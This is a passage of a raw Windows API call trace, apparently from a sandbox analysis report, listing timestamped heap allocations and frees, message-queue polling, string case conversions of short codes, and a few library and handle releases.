(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0208.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.402] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0208.402] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.403] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0208.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.403] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0208.403] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0208.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0208.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.404] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0208.404] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0208.404] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.404] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0208.404] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0208.404] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.404] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0208.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0208.405] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.405] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0208.405] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0208.405] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.405] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.405] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0208.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.406] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0208.406] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0208.406] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0208.406] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0208.407] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0208.407] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.407] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0208.407] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0208.407] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0208.407] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0208.407] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.407] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0208.408] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.408] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.408] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.408] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0208.408] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.408] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.408] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0208.409] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.409] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0208.409] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0208.409] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0208.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0208.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0208.410] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0208.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.410] CryptReleaseContext (hProv=0xad2720, dwFlags=0x0) returned 1 [0208.410] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.410] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.410] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.410] FreeLibrary (hLibModule=0x74d40000) returned 1 [0208.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.411] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0208.411] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.411] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.411] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0208.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.412] CloseHandle (hObject=0x2bc) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0208.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0208.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.413] HeapFree 